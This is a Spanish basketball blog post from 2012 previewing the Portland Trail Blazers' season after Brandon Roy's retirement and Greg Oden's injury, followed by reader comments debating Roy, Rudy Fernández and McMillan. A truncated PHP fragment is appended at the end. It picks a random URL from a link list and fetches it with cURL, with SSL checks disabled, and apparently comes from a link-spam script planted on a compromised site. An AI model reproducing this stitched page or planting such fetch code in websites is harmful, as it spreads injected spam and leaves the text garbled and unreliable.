Portland Trail Blazers: Burn the luck

13 de January de 2012 por Hynreck

Los seguidores de Gomaespuma entenderán el título a la primera, a los demás, que sepan que les queremos lo mismo.

Portland Trail Blazers, el equipo maldito. No hay manera. Decía Napoleón que él quería generales con suerte, tan importante consideraba éste factor en todos los factores de la vida. No es un discurso victimista, no es culpa de McMillan, es la realidad de esta franquicia.

Antes de comenzar la temporada se hicieron con Raymond Felton a cambio de Andre Miller y ejercían la oferta cualificada sobre Greg Oden. El quinteto Felton-Roy-Wallace-Aldridge-Oden sonaba realmente bien. Pero poco duró la ilusión. Pronto se sabría que Greg Oden, debido a una recaída, no volvería como pronto hasta febrero e incluso peligraba su participación para toda su temporada (se logró renegociar su contrato que quedó en un 1,5×1). Y cuando las manos aún no habían llegado a la cabeza surgía la noticia más dolorosa posible: Las rodillas de Brandon Roy decían basta. El jugador franquicia anunciaba su retirada a los 27 años.

Tocaba volver a empezar y de nuevo volvieron a reinventarse haciéndose en la agencia libre con Jamaal Crawford y Kurt Thomas para “cubrir” de laguna manera las bajas inesperadas.

Así que éste año partirán de inicio con Raymod Felton como PG titular. El sistema de McMillan le vendrá peor que el de D’Antoni pero se trata de un base al que le gusta correr y eso en ciertos momentos de partido le vendrá muy bien al equipo. El rookie Nolan Smith será la poca competencia que tenga por el puesto, ya que Armon Johnson ha sido enviado a la D-League.

Wesley Matthews será su acompañante de inicio en el backcourt. Un muy buen defensor que ha progresado mucho como jugador ofensivo cuando se ha visto obligado a ello. Jamaal Crawford saldrá desde el banquillo como primera opción y dará descanso tanto a Felton como a Matthews. Es el mejor sexto hombre de la liga y el máximo favorito una vez más a hacerse con tal galardón. Un auténtico microondas capaz de dar la vuelta a un partido. Otro rookie como Elliot Williams buscará algún minutillo para darse a conocer.

Gran defensor, fuerte, atlético, y cada vez más versátil en ataque. Gerald Wallace es uno de los aleros más completos de la liga y además dispone de un recambio de lujo en Nico Batum, jugador francés todavía en crecimiento y con un potencial enorme. El tercero en discordia sería Luke Babbitt, pero antes también deberá demostrarque tiene sitio en los Blazers destacando en su equipo afiliado de la liga de desarrollo.

La auténtica estrella del equipo es Lamarcus Aldridge, jugador interior al que es una delicia ver. Sus recursos al poste bajo evocan otros tiemposy supone una amenaza constante desde la media distancia. La mala noticia viene de que no tiene un recambio de calidad, salvo los minutos que pueda jugar Wallace de 4. Hubo un día que Craig Smith prometía ser un jugador interesante pero desde aquel 2009 baja prestaciones cada temporada que pasa. Chris Johnsones un temporero que tratará de hacerse un huequillo por segunda temporada en el roster.

Cerca de los 80 años suman los dos chavalitos que se repartirán los minutos al poste. Casi todos ellos serán para Marcus Camby, gran jugador de equipo y aún uno de los mejores defensores interiores de la NBA. Un ‘Bad Boy’ como Kurt Thomas dispondrá también de oportunidades para pegarse en la pintura con todo aquel que se le ponga por delante. Todo ello a la espera de saber cuándo podrán contar con Greg Oden (si es que finalmente puede volver este año).

Y con estos mimbres y una capacidad de superación envidiable, los Blazers se están mostrando como un equipo muy serio y muy competitivo. Ahora mismo son los segundos mejores del salvaje oeste y no parece que tengan ganas de aflojar aunque resulten una plantilla algo corta (su rotación es principalmente de 8 hombres). Se clasificarán para Playoffs, posiblemente con suficiencia y una vez allí, elimínalos tú que a mí me da la risa.

Quinteto: Raymond Felton, Wesley Matthews, Gerald Wallace, Lamarcus Aldridge, Marcus Camby
6º Hombre: Jamaal Crawford

Pronóstico: 4º-5º del Oeste. 2ª ronda de Playoffs.

Comenta

12 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Bueno, muy interesantes estos Blazers. A principio de temporada con lo de Roy y Oden nadie habría dado un duro por ellos. Y con la marcha de Andre Miller a los Nuggets todo pintaba mal, la verdad. Pero Raymond Felton lo está haciendo incluso mejor que Miller. Es más regular, no tan ególatra y aunque en mi opinión tiene algo menos de calidad, la sabe aprovechar mucho mejor, y defensivamente es también mejor que Miller. Sobre Crawford, el hombre que nos está haciendo olvidar a Roy. No creo que sea el mejor sexto hombre de la liga, estando por ahí un tal James Harden, pero sin duda podría serlo. No está haciendo los números exagerados que hizo en Atlanta, pero tampoco está tirando tanto. Asume su rol, que no es poco, y así ayuda mucho al equipo. La batería de aleros Wallace-Batum creo que puede considerarse desde el aspecto defensivo como la mejor de toda la liga, junto Pierce-Pietrus y Lebron-Battier. En la zona, un jugador netamente infravalorado, como Aldridge, que se merece ir a los juegos por delante de Bosh y es sencillamente un jugón de tomo y lomo, una cosa exageradamente buena. Camby como siempre, en modo Rambo, es decir, intentad matarme que yo no me muero. Es la cosa más profesional que ha habido en la liga desde EL ALMIRANTE DAVID ROBINSON. Un ejemplo para todos. No tengo claro que aunque vuelva Oden para playoffs o antes, sea titular por delante de este tío. Una grata sorpresa Portland, sobreponiéndose a todas las adversidades y postulándose claramente a segunda ronda y como bien dices, Hynreck, elminínales tu ya si eso, que a mí me da la risa. xd. Ya te digo, excepto la afirmación de que es el sexto mejor jugador de la liga, estoy muy de acuerdo con todas tus reflexiones

      Citar

  2. ralage dice:
    #2

    Sancho88 tanto como que nadie daba un duro por ellos…
    Podemos decir que pudiera sorprender que Wallace y JCrawford sigan aportando tanto, pero creo que todos los veíamos en playoffs y mas “equipo” que por ejemplo Nuggets.
    Otra cosa es que sean top 4 en el Oeste, eso si que es para quitarse el sombrero

    También destacar la actidud de su propietario Paul Allen de los más duros en las negociaciones lockout, pero al que hay que reconocer que no le importa gastar para que los Blazers sigan ahí arriba, otro cualquiera ya hubiese empezado la reconstrucción hace tiempo.

      Citar

  3. melo15 dice:
    #3

    Que pena me dan los Blazers, un equipo que podia hacer historia y que al final…
    Sobretodo me da pena Roy al que hemos criticado mucho en España porque le quitaba minutos al malo de Rudy, y Oden, que era el jugador que mas revuelo ha causado en la liga desde Lebron james.
    En fin una nueva etapa, pero pintan bien

      Citar

  4. Sancho88 dice:
    #4

    Perdona Melo, pero en España como tu dices, no se criticaba a Brandon Roy para nada. Al que criticábamos era a McMillan, porque le sacaba a que diera el show, como jugador revolución, y eso era quitarle, a mi juicio, todas las credenciales a Rudy. Creo que tiene muchas más características para que le asignasen ese rol. Por cierto, Rudy no tiene nivel para ser un escolta titular allí, y tampoco se le ven demasiadas ganas de integrarse. En Denver está haciendo un poco más que en Portland porque le dan algo más de confianza, pero vamos, este tío vuelve en verano a Madrid y ya no se va. Además, me consta que se había integrado a la perfección en la ciudad, en el equipo, etc.

      Citar

  5. Txusma dice:
    #5

    Pues yo creo que un poquito de rabia a Roy sí que se le cogió en España por el tema Rudy. A McMillan aún más, claro.

      Citar

  6. Nacho dice:
    #6

    Pues yo quiero hacer el club “Roy vente Paspaña, que aquí tu rodilla aguanta”

      Citar

  7. TheDeerHunter dice:
    #7

    McMalon desde luego… y a Roy lejanamente si queréis, por motivos muy distintos.

    Todo el mundo repite como papagayos que es un problema de chauvinismo, y creo que en buena parte se equivocan. Obviamente nuestra atención sí los atrajeron ellos. No es lo mismo que el petardo de Blake sentara a Sergio (e incluso a André XD XD XD) que si lo hubiera hecho al mismísimo Jasikevicius… pero después te ponías a ver un partidete de estos por si ellos salían y terminabas queriéndote arrancar los ojos en sin duda el juego más lento y barraquero que yo haya visto en la NBA y he visto todo tipo de entrenadores barracas)

    Sobre el tema de McMillan (que después de haber sonado para Lakers yo estoy encantado que conserve su trabajo) no voy a seguir, que ya he dicho muchas cosas. Seguiré rezando para que le vaya bien, que yo apostaría a que no será una 2ª ronda.

    Y volviendo al eje del debate que es Roy su pecado para mí es la absorción absoluta del juego. Ojo que a mí me ha parecido siempre un jugador exquisito… pero es que leches, llegaba al punto de empacho. Si le dejan podía jugar el sólo y los demás mirando (y McMalon aplaudiendo)
    Todo lo que se critica a Kobe (y por lo que se le tiene indiscutiblemente cierta manía) podría aplicarse a él… con algunos agravantes: mucho más lento/cansino/sobón en el tratamiento del balón, más repetitivo (porque era muy listo y con lo que le funcionaba en un momento dado hacía toda la sangre del mundo) Era pillar el balón al principio de la jugada, gastar 20 segundos de reloj (él) y con muchísima frecuencia terminarla. Todo el ciclo él… Roysistema.

    Para mí Roy es a lo individual como lo eran Stockton&Malone en lo colectivo (salvando las distancias) El algoritmo hecho baloncesto. Lo cual no es malo… pero pierde mucho encanto.

    Con todo para mí es una auténtica tragedia que ya no pueda jugar.

      Citar

  8. melo15 dice:
    #8

    Bueno, otra cosa esque absorviera el juego un “poco” pero cuantas veces he oido llamar a Roy el cancer de los Blazers.
    Roy era un jugador de una elegancia suprema, era un lider indiscutible, y con una variedad de recursos ofensivos inacavable, era un all-around player, un CRACK.
    Eso sin contar con un fisico de escandalo

      Citar

  9. Esteban dice:
    #9

    el analisis es bueno, pero creo q nadie en ningun momento imagino un quinteto felto-roy-wallace-aldrigue-oden

    o por q a roy le aplicaban la anmistia, o se retiraba o lo cortoba y oden por q todos imaginamos que volveria a recaer, pensar lo contrario ya creo que peca de estupido, pecado grande de los blazers, al menos renegociaron su cointrato

      Citar

  10. Jabho dice:
    #10

    La verdad es que hcae 2-3 temporadas pintaban a equipazo de futuro pero no pudo ser. Roy es todo lo que habéis dicho, pero el resultado era un pedazo de crack que, eso si, necesitaba rodearse de jugadores que asumieran jugar para él.

    Equipo duro, entrenador duro…. Veo el Oeste muy abierto y quién sabe.

    Rudy tiene condiciones físicas y técnicas para ser titular allí. Otra cosa es que el no quiera, que parece que no quiere y le falta algo de cabeza….

      Citar

  11. Esteban dice:
    #11

    cuando parecia q kwane brown se encaminaba comodo a ser el peor rookie de la decada, chaz aparece oden, q por lejos es peor q el

      Citar

  12. melo15 dice:
    #12

    Pero por culpa de las lesiones, Oden en Ohia State era una bestia imparable.
    Rudy titular donde?? En Portland, con Roy?? Ni de coña Roy era 100 veces mejor, ni punto de comparacion

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>